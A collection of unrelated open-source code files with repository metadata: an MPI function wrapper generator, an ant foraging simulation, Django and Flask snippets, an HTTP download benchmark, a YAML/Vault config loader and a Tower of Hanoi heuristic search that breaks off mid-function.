d["args"] = d["args"][:-2]
return d
def get_ret_list(rtype):
d = {}
dec_ret_val = ""
get_ret_val = ""
ret_ret_val = "return"
if(rtype != "void"):
dec_ret_val += rtype + " val = ("+rtype+") 0;"
get_ret_val += "val = "
ret_ret_val += " val"
ret_ret_val += ";"
d["dec"] = dec_ret_val
d["get"] = get_ret_val
d["ret"] = ret_ret_val
return d
def parse_mpi_functions(mpi_functions_list):
d={}
d["name"] = []
d["type"] = []
d["args"] = {}
d["args"]["type"] = []
d["args"]["name"] = []
d["args"]["post"] = []
for function in mpi_functions_list:
d["name"] += [function.split()[1].split('(')[0]]
d["type"] += [function.split()[0]]
args_list = extract_between(function, '(', ')')
name_list = []
type_list = []
post_list = []
tmp = ""
for mpi_args in args_list.split(','):
mpi_arg = mpi_args.split()
if(len(mpi_arg) > 1):
tmp_idx = mpi_arg[-1].strip('*').find("[")
if(tmp_idx < 0):
tmp_idx = len(mpi_arg[-1].strip('*'))
name_list += [mpi_arg[-1].strip('*')[0:tmp_idx]]
tmp = mpi_arg[0]
if(tmp == "const"):
tmp += " " + mpi_arg[1]
for idx in range(0,mpi_args.count('*')):
tmp += ' *'
type_list += [tmp]
if("[" in mpi_arg[-1]):
post_list += ["[]"]
else:
post_list += [""]
d["args"]["name"] += [name_list]
d["args"]["type"] += [type_list]
d["args"]["post"] += [post_list]
return d
def get_mpi_proto_list(d):
l = []
for idx,function in enumerate(d["name"]):
proto = d["type"][idx]+" "+d["name"][idx]+"("
for idy,function_name in enumerate(d["args"]["name"][idx]):
proto += d["args"]["type"][idx][idy]
proto += " "
proto += d["args"]["name"][idx][idy]
proto += d["args"]["post"][idx][idy]
proto += ", "
if(proto[-2] == ','):
proto = proto[:-2]
proto += ")"
l += [proto]
return l
def print_selfie_h_header():
s = ""
s += '''#ifndef _GNU_SOURCE
#define _GNU_SOURCE
#endif
#include <cstring>
#include <execinfo.h>
#include <dlfcn.h>
#include <cstdarg>
#include <fenv.h>
#pragma STDC FENV_ACCESS ON
typedef void (*function_type)(...);
'''
return s
def print_selfie_h_footer():
s = ""
s += '''
}
'''
return s
def print_selfie_h_n_mpi(d, plugin_name):
s = '''
/// \\brief Total number of {1} functions
#define N_{1}_FUNCTIONS {0}
'''.format(str(len(d["name"])), plugin_name.upper())
return s
def print_selfie_h_get_name(d,plugin_name):
s = ""
s +='''/// \\brief Return a string containing name of functions
/// \\param[in] i Index
/// \\return Return a string containing name of functions
///
char *selfie_get_{0}_function_name(int i)
{{
char const *{0}_functions_name[] = {{
'''.format(plugin_name)
for name in d["name"]:
s += ''' "{0}",\n'''.format(name)
for name in d["name"]:
s += ''' "P{0}",\n'''.format(name)
s += ''' NULL
}};
return strdup({0}_functions_name[i]);
}};
'''.format(plugin_name)
return s
def print_selfie_h_builtin_function(idx, name, symbol, rtype, plugin_name):
d_ret = get_ret_list(rtype)
s = '''
#ifdef __SELFIE_MPI_BUILTIN__
/// \\brief {1}
///
/// \\param ...
/// \\return {3}
///
/// \details
///
{3} {1}(...)
{{
double f_start = 0.0;
function_type selfie_function = NULL;
int ap_except = 0;
selfie_function = selfie_{4}_pointer_functions[{0}];
if(selfie_function == NULL)
{{
selfie_function = (function_type) dlsym(RTLD_NEXT,"{2}");
}}
selfie_{4}_global_data[{0}].function_count++;
f_start = selfie_mysecond();
ap_except = fedisableexcept(FE_INVALID);
void* ret = __builtin_apply(selfie_function,
__builtin_apply_args(), 1024);
feclearexcept(FE_INVALID);
feenableexcept(ap_except);
selfie_{4}_global_data[{0}].function_time += selfie_mysecond() - f_start;
__builtin_return(ret);
}};
#endif
'''.format(idx, name, symbol, rtype, plugin_name)
return s
def print_selfie_h_functions(d,plugin_name):
s = ""
for idx,name in enumerate(d["name"]):
s += print_selfie_h_builtin_function(idx, name, name,
d["type"][idx], plugin_name)
s += print_selfie_h_builtin_function(idx,
"P"+name, name, d["type"][idx],
plugin_name)
return s
def print_selfie_h_global_array(d,plugin_name):
s = '''
/// \\brief Array of pointers of functions
function_type selfie_{1}_orig_pointer_functions[{0}] = {{NULL}};
/// \\brief Array of pointers of functions
function_type *selfie_{1}_pointer_functions = selfie_{1}_orig_pointer_functions;
'''.format(len(d["name"]),plugin_name)
return s
def print_selfie_h(d,pname):
s = ""
s += print_selfie_h_header()
s += print_selfie_h_n_mpi(d, pname)
s += print_selfie_h_get_name(d, pname)
s += print_selfie_h_global_array(d, pname)
s += "\nextern \"C\" {\n\n"
s += print_selfie_h_functions(d, pname)
s += print_selfie_h_footer()
return s
def read_inputfile(inputfile):
function_list = []
with open(inputfile,"r") as fdi:
for line in fdi:
if (len(line) > 1):
function_list += [line[:-1]]
return function_list
def main():
parser = argparse.ArgumentParser(
description="Generate list of MPI functions")
parser.add_argument("-p","--proto",action="store_true",
default=False,
help="Print list of MPI functions prototypes")
parser.add_argument("-i","--input",action="store",
default=None,
help="File containing MPI functions list")
parser.add_argument("-n","--name",action="store",
default="mpi",
help="Name of plugin")
parser.add_argument("-o","--output",action="store",
default=None,
help="File where to print "+
"result (If None, print to stdout)")
args = parser.parse_args()
print("")
print(parser.description)
print("")
header = True
# Print proto or not
if(args.proto == True):
header = False
# Input file
if(args.input != None):
mpi_function_list = read_inputfile(args.input)
else:
mpi_function_list = default_mpi_function_list
# Output file
if(args.output != None):
outfile = args.output
else:
outfile = None
pname = args.name
# Parse functions
d = parse_mpi_functions(mpi_function_list)
# Print prototypes
if(header == False):
if(outfile == None):
for proto_name in get_mpi_proto_list(d):
print(proto_name)
else:
with open(outfile,"w") as fd:
for proto_name in get_mpi_proto_list(d):
fd.write(proto_name)
print("File "+outfile+" written")
# Print header
else:
if(outfile == None):
print(print_selfie_h(d,pname))
else:
with open(outfile,"w") as fd:
fd.write(print_selfie_h(d,pname))
print("File "+outfile+" written")
if __name__ == "__main__": main()
|
cea-hpc/selFIe
|
src/parse_mpi.py
|
parse_mpi.py
|
py
| 9,164 |
python
|
en
|
code
| 16 |
github-code
|
6
|
18798291843
|
import matplotlib.pyplot as plt
import random
import numpy as np
from IPython.display import display, clear_output
import time
def head_home(x, y):
"""
Head home down and to the left.
Parameters
----------
x : float
Horizontal coordinate.
y : float
Vertical coordinate.
Returns
-------
x : float
Updated horizontal coordinate.
y : float
Updated vertical coordinate.
"""
pick = np.zeros(x + y)
pick[0:x] = 1
if (np.random.choice(pick) == 1):
x -= 1
else:
y -= 1
if (x < 0):
x = 0
if (y < 0):
y = 0
return x, y
def search_for_food(x, y, smell):
"""
Search for food by following the smell.
Parameters
----------
x : float
Horizontal coordinate.
y : float
Vertical coordinate.
smell : numpy.ndarray
2D array of smells
Returns
-------
x : float
Updated horizontal coordinate.
y : float
Updated vertical coordinate.
"""
directions = ['up', 'left', 'down', 'right']
x_dim = smell.shape[0]
y_dim = smell.shape[1]
# First check to see if there is food up and to the right.
g = [] # follow gradient
m = []
if (x + 1 < x_dim):
if (smell[x + 1, y] > 0):
m.append(smell[x + 1, y])
g.append('right')
if (y + 1 < y_dim):
if (smell[x, y + 1] > 0):
m.append(smell[x, y + 1])
g.append('up')
if (g != []):
grad = g[m.index(max(m))]
# print("Following smell", grad)
else:
# else just pick a random direction.
grad = random.choice(directions)
# print("Choosing ",grad)
# move the ant
if (grad == 'up'):
y = y + 1
elif (grad == 'right'):
x = x + 1
elif (grad == 'down'):
y = y - 1
elif (grad == 'left'):
x = x - 1
else:
print(grad)
print("ERROR!!!!!!!!!!!!")
# make sure we don't go off the gird.
if (x < 0):
x = 0
if (y < 0):
y = 0
if (x > x_dim - 1):
x = x_dim - 1
if (y > y_dim - 1):
y = y_dim - 1
return x, y
def run(num_ants=100, x_dim=70, y_dim=30):
"""
Run the simulation
Parameters
----------
num_ants : int
Initial number of ants to simulate. Dafualt =100
x_dim : int
Horizontal dimension of the board. Default = 70
y_dim : int
Vertical dimension of the board. Default = 30
"""
smell = np.zeros((x_dim, y_dim))
food = np.zeros((x_dim, y_dim))
# place food
food[45:50, 25:30] = 10
food[45:50, 25:30] = 10
food[65:70, 0:5] = 10
x_loc = np.random.randint(0, x_dim, size=(num_ants, 1))
y_loc = np.random.randint(0, y_dim, size=(num_ants, 1))
ant_loc = np.concatenate((x_loc, y_loc), axis=1)
has_food = np.zeros((num_ants, 1))
fig, ax = plt.subplots(figsize=(10, 5))
# Main simulation loop
for i in range(0, 100):
# Loop over ants
for a in range(0, num_ants):
x = ant_loc[a, 0]
y = ant_loc[a, 1]
if (x == 0 and y == 0):
has_food[a] = 0
if has_food[a] > 0:
x, y = head_home(x, y)
smell[x, y] = smell[x, y] + 100
else:
x, y = search_for_food(x, y, smell)
if food[x, y] > 0:
food[x, y] -= 1
has_food[a] = 1
ant_loc[a, 0] = x
ant_loc[a, 1] = y
smell = smell - 1
smell[smell < 0] = 0
# plot world
plt.imshow(food.T, origin='lower', aspect='equal', cmap="magma")
for a in range(0, num_ants):
color = 'r'
if (has_food[a] > 0):
color = 'g'
plt.scatter(ant_loc[a, 0], ant_loc[a, 1], color=color)
# Animaiton part (dosn't change)
clear_output(wait=True) # Clear output for dynamic display
display(fig) # Reset display
fig.clear() # Prevent overlapping and layered plots
time.sleep(0.0001) # Sleep for a fraction of a second to allow animation to catch up
|
msu-cmse-courses/cmse202-F22-data
|
code_samples/ant_function.py
|
ant_function.py
|
py
| 4,304 |
python
|
en
|
code
| 1 |
github-code
|
6
|
14868890436
|
from django.views.generic.base import TemplateView
from albums.forms import FileForm
from albums.models import Album, File
from core.decorators import view_decorator
from core.views import ResourceView
class AlbumPage(TemplateView):
template_name = "albums/main.html"
def expose(view):
view.expose = True
return view
@view_decorator(expose)
class AlbumView(ResourceView):
model = Album
@view_decorator(expose)
class FileView(ResourceView):
create_form = FileForm
model = File
|
qrees/backbone-gallery
|
albums/views.py
|
views.py
|
py
| 508 |
python
|
en
|
code
| 0 |
github-code
|
6
|
20156935479
|
from flask import request
def validate_id(id):
# if not found in params
if (id is None):
raise TypeError("Request params (id) not found")
# if description params is empty
if not id:
raise ValueError("id is empty")
# if not integer
if not isinstance(id, int):
raise TypeError("id is not integer")
def validate_latitude(latitude):
# if not found in params
if (latitude is None):
raise TypeError("Request params (latitude) not found")
# if not float
if not isinstance(latitude, float):
raise TypeError("latitude is not float")
def validate_longtitude(longtitude):
# if not found in params
if (longtitude is None):
raise TypeError("Request params (longtitude) not found")
# if not float
if not isinstance(longtitude, float):
raise TypeError("longtitude is not float")
def point_read_contract(request):
id = request.args.get('id', type=int)
validate_id(id)
return {
'id': int(id)
}
def point_create_contract(request):
latitude = request.args.get('latitude', type=float)
longtitude = request.args.get('longtitude', type=float)
validate_latitude(latitude)
validate_longtitude(longtitude)
return {
'latitude': float(latitude),
'longtitude': float(longtitude)
}
|
adriangohjw/cz2006-software-engineering
|
contracts/point_contracts.py
|
point_contracts.py
|
py
| 1,360 |
python
|
en
|
code
| 0 |
github-code
|
6
|
38815716976
|
import argparse
import asyncio
import csv
import functools
import gc
import hashlib
import http.client
import importlib
import io
import math
import platform
import re
import socket
import statistics
import sys
import textwrap
import time
import urllib.parse
from typing import Callable, Awaitable, Tuple, Iterable, Optional
_Method = Callable[[str], bytes]
_AMethod = Callable[[str], Awaitable[bytes]]
METHODS = {}
CHECKSUMS = {
10**6 + 128: 'fa82243e0db587af04504f5d3229ff7227f574f8f938edaad8be8e168bc2bc87',
10**7 + 128: '128ceaac08362426bb7271ed6202d11c6830587a415bd7868359725c22d2fe88',
10**9 + 128: 'd699e2c306b897609be6222315366b25137778e18f8634c75b006cef50647978'
}
def method(name: str, requires: Iterable[str] = ()) -> Callable[[_Method], _Method]:
def decorate(func: _Method) -> _Method:
for mod in requires:
try:
importlib.import_module(mod)
except ImportError:
return func
METHODS[name] = func
return func
return decorate
def run_async(func: _AMethod) -> _Method:
@functools.wraps(func)
def wrapper(url: str) -> bytes:
loop = asyncio.new_event_loop()
try:
asyncio.set_event_loop(loop)
return loop.run_until_complete(func(url))
finally:
loop.run_until_complete(loop.shutdown_asyncgens())
loop.close()
return wrapper
@method('httpclient')
def load_httpclient(url: str) -> bytes:
parts = urllib.parse.urlparse(url)
conn = http.client.HTTPConnection(parts.netloc)
conn.request('GET', parts.path)
resp = conn.getresponse()
return resp.read(resp.length) # type: ignore
@method('httpclient-na')
def load_httpclient_na(url: str) -> bytes:
parts = urllib.parse.urlparse(url)
conn = http.client.HTTPConnection(parts.netloc)
conn.request('GET', parts.path)
resp = conn.getresponse()
return resp.read()
@method('requests', ['requests'])
def load_requests(url: str) -> bytes:
import requests
return requests.get(url).content
@method('requests-c1M', ['requests'])
def load_requests_c1M(url: str) -> bytes:
import requests
old_chunk = requests.models.CONTENT_CHUNK_SIZE
try:
requests.models.CONTENT_CHUNK_SIZE = 1024 * 1024
return requests.get(url).content
finally:
requests.models.CONTENT_CHUNK_SIZE = old_chunk
@method('requests-stream', ['requests'])
def load_requests_stream(url: str) -> bytes:
import requests
with requests.get(url, stream=True) as resp:
return resp.raw.read()
@method('requests-stream-fp-read', ['requests'])
def load_requests_stream_fp_read(url: str) -> bytes:
import requests
with requests.get(url, stream=True) as resp:
return resp.raw._fp.read()
@method('requests-np', ['requests', 'numpy'])
def load_requests_np(url: str) -> bytes:
import requests
import numpy as np
with requests.get(url, stream=True) as resp:
data = np.empty(int(resp.headers['Content-length']), np.uint8)
resp.raw.readinto(memoryview(data))
return data
@method('requests-np-fp', ['requests', 'numpy'])
def load_requests_np(url: str) -> bytes:
import requests
import numpy as np
with requests.get(url, stream=True) as resp:
data = np.empty(int(resp.headers['Content-length']), np.uint8)
resp.raw._fp.readinto(memoryview(data))
return data
@method('urllib3', ['urllib3'])
def load_urllib3(url: str) -> bytes:
import urllib3
return urllib3.PoolManager().request('GET', url).data
@method('tornado', ['tornado'])
@run_async
async def load_tornado(url: str) -> bytes:
import tornado.simple_httpclient
client = tornado.simple_httpclient.SimpleAsyncHTTPClient(max_body_size=10**10)
response = await client.fetch(url)
return response.body
@method('aiohttp', ['aiohttp'])
@run_async
async def load_aiohttp(url: str) -> bytes:
import aiohttp
async with aiohttp.ClientSession() as session:
async with session.get(url) as resp:
return await resp.read()
@method('httpx', ['httpx'])
def load_httpx(url: str) -> bytes:
import httpx
return httpx.get(url).content
@method('httpx-async', ['httpx'])
@run_async
async def load_httpx_async(url: str) -> bytes:
import httpx
async with httpx.AsyncClient() as client:
r = await client.get(url)
return r.content
def prepare_socket(url: str) -> Tuple[io.BufferedIOBase, int]:
parts = urllib.parse.urlparse(url)
address = (parts.hostname, parts.port)
sock = socket.socket()
sock.connect(address)
req_header = textwrap.dedent(f'''\
GET {parts.path} HTTP/1.1
Host: {parts.hostname}:{parts.port}
User-Agent: python
Connection: close
Accept: */*
''').replace('\n', '\r\n').encode('ascii')
fh = sock.makefile('rwb')
fh.write(req_header)
fh.flush()
content_length: Optional[int] = None
while True:
line = fh.readline()
if line == b'\r\n':
if content_length is None:
raise RuntimeError('Did not receive Content-Length header')
return fh, content_length # type: ignore
else:
text = line.decode('latin-1').rstrip().lower()
if text.startswith('content-length: '):
content_length = int(text.split(' ')[1])
@method('socket-read')
def load_socket_read(url: str) -> bytes:
fh, content_length = prepare_socket(url)
return fh.read(content_length)
@method('socket-readinto')
def load_socket_readinto(url: str) -> bytes:
fh, content_length = prepare_socket(url)
raw = bytearray(content_length)
n = fh.readinto(raw)
assert n == content_length
return memoryview(raw)[:n]
def validate(data: bytes):
size = len(data)
try:
checksum = CHECKSUMS[size]
except KeyError:
print('No checksum found')
else:
actual_checksum = hashlib.sha256(data).hexdigest()
if actual_checksum != checksum:
print(f'Checksum mismatch ({actual_checksum} != {checksum})')
def measure_method(method: str, args: argparse.Namespace) -> None:
# Warmup pass
METHODS[method](args.url)
rates = []
size = 0
for i in range(args.passes):
gc.collect()
start = time.monotonic()
data = METHODS[method](args.url)
stop = time.monotonic()
elapsed = stop - start
rates.append(len(data) / elapsed)
if i == 0:
validate(data)
size = len(data)
del data
mean = statistics.mean(rates)
std = statistics.stdev(rates) / math.sqrt(args.passes - 1)
return mean, std, size
def main():
parser = argparse.ArgumentParser()
parser.add_argument('--passes', type=int, default=5)
parser.add_argument('--csv', action='store_true')
parser.add_argument('method')
parser.add_argument('url')
args = parser.parse_args()
if args.method not in METHODS and args.method != 'all':
parser.error('Method must be "all" or one of {}'.format(set(METHODS.keys())))
if args.csv:
writer = csv.DictWriter(sys.stdout, ['Python', 'Method', 'Size', 'mean', 'std'])
writer.writeheader()
match = re.search(r'PyPy \S+', sys.version)
if match:
version = match.group(0)
else:
version = platform.python_version()
if args.method == 'all':
methods = METHODS
else:
methods = [args.method]
for method in methods:
mean, std, size = measure_method(method, args)
if args.csv:
writer.writerow(
{
'Python': version,
'Method': method,
'Size': size,
'mean': mean,
'std': std
}
)
else:
print('{}: {:.1f} ± {:.1f} MB/s'.format(method, mean / 1e6, std / 1e6))
if __name__ == '__main__':
main()
|
ska-sa/pyconza2020-httpbench
|
httpbench.py
|
httpbench.py
|
py
| 8,026 |
python
|
en
|
code
| 4 |
github-code
|
6
|
25073375848
|
import math
def f(a:float, b:float, c:float) -> float:
if a==0:
raise Exception("a no puede ser cero")
if b*b< 4*a*c:
raise Exception("Esos valores dan un resultado complejo")
try:
d=(-b + math.sqrt(b*b - 4*a*c))/(2*a)
except:
print("Hay un error")
return d
a=0
b=3
c=-3
print(f(a,b,c))
|
Gohan2021/ProgAplicada
|
tarea_2023_0227.py
|
tarea_2023_0227.py
|
py
| 313 |
python
|
es
|
code
| 0 |
github-code
|
6
|
10819469391
|
import numpy as np
import argparse
import imutils
import cv2
ap = argparse.ArgumentParser()
ap.add_argument("-i","--image",required = True, help="Path of Image File")
args = vars(ap.parse_args())
#image = cv2.imread("image.png")
print("Path: ", args["image"])
image = cv2.imread(args["image"])
# find all the 'black' shapes in the image
upper = np.array([15,15,15])
lower = np.array([0,0,0])
shapeMask = cv2.inRange(image,lower,upper)
# find the contours in the mask
cnts = cv2.findContours(shapeMask.copy(), cv2.RETR_EXTERNAL,
cv2.CHAIN_APPROX_SIMPLE)
cnts = imutils.grab_contours(cnts)
print("Found {} black shapes".format(len(cnts)))
cv2.imshow("Mask", shapeMask)
# loop over the contours
for c in cnts:
# draw the contour and show it
cv2.drawContours(image, [c], -1, (0, 255, 0), 2)
cv2.imshow("Image", image)
cv2.waitKey(0)
|
Pallavi04/ComputerVision
|
FindShapes/shape.py
|
shape.py
|
py
| 837 |
python
|
en
|
code
| 0 |
github-code
|
6
|
27022143594
|
from pymongo import MongoClient
import pprint
from urllib.request import urlopen
from bs4 import BeautifulSoup
class Data_extraction_creation:
def __init__(self):
self.source=""
self.search=""
self.search_length=0
def getting_source(self):
#client=MongoClient("mongodb://127.0.0.1:27017")
#database=client['testing']
self.file_name=input("Enter the name of the text file to read the source code :\n")
self.file_name = self.file_name + ".txt"
self.file_open=open(self.file_name, 'r')
self.file2=self.file_open.read()
self.file=BeautifulSoup(self.file2)
print(self.file + "\n\n")
self.search="small text-uber-white"
search_length=len(self.search)
c=0
for i in range(0, len((self.file))-search_length): # for total counting part
substr = self.file[i:i+search_length]
if self.search == substr:
c = c + 1
if c == 3: # got the total time of the day
self.time_total = self.file[i+search_length+2: i+search_length+12]
if c==4: # got the total distance of the day
self.distance_total = self.file[i+search_length+2:i+search_length+7] + " km"
if c==5: # got the total cash collection
self.cash_collection_total = self.file[i+search_length+2:i+search_length+10]
if c==6: # got the total earnings
self.earnings_total = self.file[i+search_length+2: i+search_length+10]
break
#print(self.time_total + self.distance_total + self.cash_collection_total + self.earnings_total)
self.search='<p class="portable-soft-huge--right submenu__item__link layout cursor--pointer"><span class="layout__item portable-one-half one-half">' # first day
search_length=len(self.search)
c=0
day=""
#collection=database[day]
day_last_left=0
for i in range(0, len((self.file))-search_length): # counting individual trip of that day.
substr = self.file[i:i+search_length]
if self.search == substr:
trip_number=-1
pos=i
pos_span_ending=0
ending_span=""
for oo in range(1, 1000):
ss=self.file[pos + oo: pos+oo+7]
if ss=="</span>":
pos_span_ending=pos+oo
c = c + 1 # day count
day = self.file[i+search_length+1:pos_span_ending+1]
s_trip_start='<span class="trip-list__date layout__item one-quarter">'
s_trip_time='<span class="trip-list__duration layout__item one-quarter">'
s_trip_distance='<span class="trip-list__distance layout__item one-quarter"'
s_trip_earning='<span class="soft-tiny--left"'
span_endings='</span>'
s_trip_start_l=len(s_trip_start)
s_trip_time_l=len(s_trip_time)
s_trip_distance_l=len(s_trip_distance)
s_trip_earning_l=len(s_trip_earning)
e_trip_start=0
e_trip_time=0
e_trip_distance=0
e_trip_earning=0
check=2
trip_number = trip_number + 1
# trip time
for r in range(e_trip_time, len(self.file)- s_trip_time_l):
t = self.file[ e_trip_time + r : e_trip_time + r + s_trip_time_l ]
check=2
if t == s_trip_time:
start = r + s_trip_time_l +1
for m in range(1,100): # trip time findings
now=self.file[r+m: r+m+7]
if now==span_endings:
e_trip_time=r+m+7
self.trip_time=self.file[start : e_trip_time + 1 ]
check=0
break
if trip_number==0:
continue
if check==0:
check=2
break
# trip start time
for r in range(e_trip_start, len(self.file)- s_trip_start_l):
t = self.file[ e_trip_start + r : e_trip_start + r + s_trip_start_l ]
check=2
if t == s_trip_start:
start = r + s_trip_start_l +1
for m in range(1,100): # trip time findings
now=self.file[r+m: r+m+7]
if now==span_endings:
e_trip_start=r+m+7
self.trip_start=self.file[start : e_trip_start + 1 ]
check=0
break
if trip_number==0:
continue
if check==0:
check=2
break
#trip distance
for r in range(e_trip_distance, len(self.file)- s_trip_distance_l):
t = self.file[ e_trip_distance + r : e_trip_distance + r + s_trip_distance_l ]
check=2
if t== s_trip_distance:
start = r + s_trip_distance_l +1
for m in range(1,100): # trip time findings
now=self.file[r+m: r+m+7]
if now==span_endings:
e_trip_distance=r+m+7
self.trip_distance=self.file[start : e_trip_distance + 1 ]
check=0
break
if trip_number==0:
continue
if check==0:
check=2
break
# trip earnings
for r in range(e_trip_earning, len(self.file)- s_trip_earning_l):
t = self.file[ e_trip_earning + r : e_trip_earning + r + s_trip_earning_l ]
check=2
if t==s_trip_earning:
start = r + s_trip_earning_l +1
for m in range(1,100): # trip time findings
now=self.file[r+m: r+m+7]
if now==span_endings:
e_trip_earning=r+m+7
self.trip_earning=self.file[start : e_trip_earning + 1 ]
check=0
break
if trip_number==0:
continue
if check==0:
check=2
break
# completed trips calcultaion for one trip.
print("Day "+day)
print("Trip number "+str(trip_number))
print("Trip starting "+self.trip_start)
print("Trip time "+self.trip_time)
print("Trip distance "+self.trip_distance)
print("Trip earnings "+self.trip_earning)
object= Data_extraction_creation()
object.getting_source()
|
Harkishen-Singh/Uber-App-Record-Analysis
|
creating databasse copy.py
|
creating databasse copy.py
|
py
| 7,444 |
python
|
en
|
code
| 0 |
github-code
|
6
|
21892483057
|
#!/bin/python3
import os
import sys
#
# Complete the xorMatrix function below.
#
#define GET_BIT(x, bit) (((x)>>(bit)) & 1ULL)
def xorMatrix(m, first_row):
m = m - 1
for j in range(63, -1, -1):
if((m>>j) & 1 == 1):
intialRow = first_row.copy()
for i in range(0, len(first_row)):
first_row[i] ^= intialRow[(i + (1<<j)) % len(first_row)];
return first_row
if __name__ == '__main__':
fptr = open(os.environ['OUTPUT_PATH'], 'w')
nm = input().split()
n = int(nm[0])
m = int(nm[1])
first_row = list(map(int, input().rstrip().split()))
last_row = xorMatrix(m, first_row)
fptr.write(' '.join(map(str, last_row)))
fptr.write('\n')
fptr.close()
|
shady236/HackerRank-Solutions
|
Algorithms/XOR Matrix/XOR Matrix.py
|
XOR Matrix.py
|
py
| 803 |
python
|
en
|
code
| 0 |
github-code
|
6
|
29381018111
|
import copy
import tempfile
import yaml
import re
import os
import constellation.vault as vault
from constellation.util import ImageReference
def read_yaml(filename):
with open(filename, "r") as f:
dat = yaml.load(f, Loader=yaml.SafeLoader)
dat = parse_env_vars(dat)
return dat
def config_build(path, data, extra=None, options=None):
data = copy.deepcopy(data)
if extra:
data_extra = read_yaml("{}/{}.yml".format(path, extra))
config_check_additional(data_extra)
combine(data, data_extra)
if options:
if isinstance(options, list):
options = collapse(options)
config_check_additional(options)
combine(data, options)
return data
# Utility function for centralising control over pulling information
# out of the configuration.
def config_value(data, path, data_type, is_optional, default=None):
if type(path) is str:
path = [path]
for i, p in enumerate(path):
try:
data = data[p]
if data is None:
raise KeyError()
except KeyError as e:
if is_optional:
return default
e.args = (":".join(path[:(i + 1)]),)
raise e
expected = {"string": str,
"integer": int,
"boolean": bool,
"dict": dict,
"list": list}
if type(data) is not expected[data_type]:
raise ValueError("Expected {} for {}".format(
data_type, ":".join(path)))
return data
# TODO: This can be made better with respect to optional values (e.g.,
# if url is present other keys are required).
def config_vault(data, path):
url = config_string(data, path + ["addr"], True)
auth_method = config_string(data, path + ["auth", "method"], True)
auth_args = config_dict(data, path + ["auth", "args"], True)
return vault.vault_config(url, auth_method, auth_args)
def config_string(data, path, is_optional=False, default=None):
return config_value(data, path, "string", is_optional, default)
def config_integer(data, path, is_optional=False, default=None):
return config_value(data, path, "integer", is_optional, default)
def config_boolean(data, path, is_optional=False, default=None):
return config_value(data, path, "boolean", is_optional, default)
def config_dict(data, path, is_optional=False, default=None):
return config_value(data, path, "dict", is_optional, default)
def config_dict_strict(data, path, keys, is_optional=False, default=None):
d = config_dict(data, path, is_optional)
if not d:
return default
if set(keys) != set(d.keys()):
raise ValueError("Expected keys {} for {}".format(
", ".join(keys), ":".join(path)))
for k, v in d.items():
if type(v) is not str:
raise ValueError("Expected a string for {}".format(
":".join(path + [k])))
return d
def config_list(data, path, is_optional=False, default=None):
return config_value(data, path, "list", is_optional, default)
def config_enum(data, path, values, is_optional=False, default=None):
value = config_string(data, path, is_optional, default)
if value not in values:
raise ValueError("Expected one of [{}] for {}".format(
", ".join(values), ":".join(path)))
return value
def config_image_reference(dat, path, name="name"):
if type(path) is str:
path = [path]
repo = config_string(dat, path + ["repo"])
name = config_string(dat, path + [name])
tag = config_string(dat, path + ["tag"])
return ImageReference(repo, name, tag)
def config_check_additional(options):
if "container_prefix" in options:
raise Exception("'container_prefix' may not be modified")
def combine(base, extra):
"""Combine exactly two dictionaries recursively, modifying the first
argument in place with the contets of the second"""
for k, v in extra.items():
if k in base and type(base[k]) is dict and v is not None:
combine(base[k], v)
else:
base[k] = v
def collapse(options):
"""Combine a list of dictionaries recursively, combining from left to
right so that later dictionaries override values in earlier ones"""
ret = {}
for o in options:
combine(ret, o)
return ret
def parse_env_vars(data):
if isinstance(data, (dict, list)):
for k, v in (data.items() if isinstance(data, dict)
else enumerate(data)):
if isinstance(v, (dict, list)):
data[k] = parse_env_vars(v)
if isinstance(v, str) and re.search("^\\$[0-9A-Z_]+$", v):
data[k] = get_envvar(v[1:])
return data
def get_envvar(name):
try:
return os.environ[name]
except KeyError:
raise KeyError("Did not find env var '{}'".format(
name))
|
reside-ic/constellation
|
constellation/config.py
|
config.py
|
py
| 4,914 |
python
|
en
|
code
| 0 |
github-code
|
6
|
10252651311
|
from secuenciales.colaprioridad import *
from secuenciales.pila import Pila
import copy
class nodoGrafo:
def __init__(self, nodo_padre, torreA, torreB, torreC):
self.torreA = torreA
self.torreB = torreB
self.torreC = torreC
self.padre = nodo_padre
self.nivel = self.calcularNivelNodo()
self.funcion_heuristica = self.CalcularFuncionHeuristica()
def calcularNivelNodo(self):
if self.padre is not None:
return self.padre.nivel + 1
else:
return 0
def calcularFuncionHeuristicaTorre(self, torre, idTorre):
iteracion = 0
aux_disco = 0
valor_heuristico_torre = 0
if len(torre) > 0:
for disco in torre:
if iteracion == 0:
aux_disco = disco
iteracion += 1
elif aux_disco < disco:
if idTorre == "A": valor_heuristico_torre += 1
if idTorre == "B": valor_heuristico_torre += 15
if idTorre == "C": valor_heuristico_torre += 10
aux_disco = disco
elif aux_disco > disco:
valor_heuristico_torre -= 1000
if idTorre == "A": valor_heuristico_torre += 1
if idTorre == "B": valor_heuristico_torre += 15
if idTorre == "C": valor_heuristico_torre += 10
return valor_heuristico_torre
def CalcularFuncionHeuristica(self):
valor_heuristico = 0
valor_heuristico += self.calcularFuncionHeuristicaTorre(self.torreA, "A")
valor_heuristico += self.calcularFuncionHeuristicaTorre(self.torreB, "B")
valor_heuristico += self.calcularFuncionHeuristicaTorre(self.torreC, "C")
if len(self.torreC) > 0:
actual = 0
for disco in self.torreC:
actual = disco
if actual == 4:
valor_heuristico += 15
if actual == 3:
valor_heuristico += 10
if actual == 2:
valor_heuristico += 5
if actual == 1:
valor_heuristico += 1
if self.nivel > 15:
valor_heuristico -= 15
return valor_heuristico - self.nivel
def convertirEnLista(self, torre):
auxTorre = copy.deepcopy(torre)
lista = []
if len(auxTorre) > 0:
for disco in auxTorre:
lista.append(disco)
auxTorre.desapilar()
return lista
def generarEstadosSucesores(self):
lista_sucesores = []
if not (self.torreA.cima() is None):
lista_sucesores += self.generarSucesores("A")
if not (self.torreB.cima() is None):
lista_sucesores += self.generarSucesores("B")
if not (self.torreC.cima() is None):
lista_sucesores += self.generarSucesores("C")
return lista_sucesores
def generarSucesores(self, idTorre):
if idTorre == "A":
lista_sucesoresA = []
copia_estado1 = copy.deepcopy(self)
copia_estado2 = copy.deepcopy(self)
copia_estado1.torreB.apilar(copia_estado1.torreA.cima())
copia_estado1.torreA.desapilar()
self.recalcularParametros(copia_estado1)
lista_sucesoresA.append(copia_estado1)
copia_estado2.torreC.apilar(copia_estado2.torreA.cima())
copia_estado2.torreA.desapilar()
self.recalcularParametros(copia_estado2)
lista_sucesoresA.append(copia_estado2)
return lista_sucesoresA
if idTorre == "B":
lista_sucesoresB = []
copia_estado1 = copy.deepcopy(self)
copia_estado2 = copy.deepcopy(self)
copia_estado1.torreA.apilar(copia_estado1.torreB.cima())
copia_estado1.torreB.desapilar()
